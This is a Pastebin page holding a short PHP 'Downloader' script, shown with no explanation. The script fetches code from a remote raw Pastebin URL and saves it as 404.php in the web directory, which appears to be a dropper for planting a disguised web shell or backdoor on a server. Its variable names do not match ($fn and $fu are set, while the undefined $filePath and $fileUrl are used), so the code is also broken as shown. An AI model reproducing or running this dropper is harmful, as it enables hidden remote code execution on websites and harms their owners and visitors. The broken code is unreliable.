Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- //The Downloader
- $fn = __DIR__.'/404.php';
- $fu = 'https://pastebin.com/raw/pH14WLTs';
- if (!file_exists($filePath) || filesize($filePath) == 0) {
- if (function_exists('curl_version')) {
- $ch = curl_init($fileUrl);
- $fp = fopen($filePath, 'w');
- curl_setopt($ch, CURLOPT_FILE, $fp);
- curl_exec($ch);
- curl_close($ch);
- fclose($fp);
- } else {
- copy($fileUrl, $filePath);
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement